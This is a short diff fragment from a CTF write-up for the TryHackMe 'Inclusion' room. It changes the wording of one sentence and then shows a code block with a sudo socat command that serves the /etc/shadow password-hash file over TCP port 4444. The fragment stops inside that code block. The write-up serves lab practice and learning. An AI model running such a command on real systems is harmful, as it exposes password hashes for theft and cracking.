Prim1Tive/CTFwriteups/TryHackMe/Inclusion.md

 >[$file] =                the file we want to read

-our syntax will be as follow (dont forget 'sudo' to run this proccess as root)
+our syntax will be as follow (dont forget 'sudo' to run socat as root)

 ```bash
 sudo socat TCP4-LISTEN:4444,reuseaddr OPEN:/etc/shadow